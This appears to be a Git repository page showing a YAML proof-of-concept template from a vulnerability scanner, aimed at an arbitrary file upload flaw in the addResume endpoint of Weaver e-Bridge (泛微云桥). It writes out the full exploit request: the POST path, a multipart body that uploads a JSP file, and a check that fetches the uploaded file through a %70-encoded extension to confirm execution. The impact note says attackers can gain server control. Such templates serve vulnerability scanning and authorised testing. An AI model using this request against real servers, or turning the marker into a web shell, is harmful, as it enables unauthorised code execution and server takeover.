MasonLiu/Poc_Scanner
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
1d17587dc6
Poc_Scanner/poc/OA-Poc/eBridge-addResume-upload.yaml

36 lines
1.7 KiB
YAML
Raw Normal View History

首次上传
2024-10-09 15:15:50 +08:00
keyword: e-Bridge
name: 泛微云桥任意文件上传漏洞
description: | # 下一行可填写漏洞描述
泛微云桥(e-Bridge)系统接口addResume存在任意文件上传漏洞
requests: # 为空代表默认或者不启用
path: "/wxclient/app/recruit/resume/addResume?fileElementld=111"
method: POST
headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryDOVhr5SwLI1wpry7
body-raw: |- # 如果需要发送请求体,在下一行开始填写
------WebKitFormBoundaryDOVhr5SwLI1wpry7
Content-Disposition: form-data; name="file";filename="1.jsp"
<%out.println("vuln");%>
------WebKitFormBoundaryDOVhr5SwLI1wpry7--
Content-Disposition: form-data; name="file";filename="2.jsp"
1
------WebKitFormBoundaryDOVhr5SwLI1wpry7--
response:
path: "/upload/202408/SV/1.js%70" # 不填则默认接收此请求的响应包
status-code: 200
body: "vuln" # 此处可填写响应体中确认漏洞存在的关键字或者其他信息
time: # 此处填写响应包响应时间,默认不启用
headers:
Server:
Content-type:
Content-length:
Date:
Connection:
impact: | # 下一行可填写漏洞影响
泛微云桥e-Bridge是上海泛微公司在”互联网+”的背景下研发的一款用于桥接互联网开放资源与企业信息化系统的系统集成中间件。攻击者可通过任意文件上传漏洞上传文件,获取服务器权限。
Reference in New Issue Copy Permalink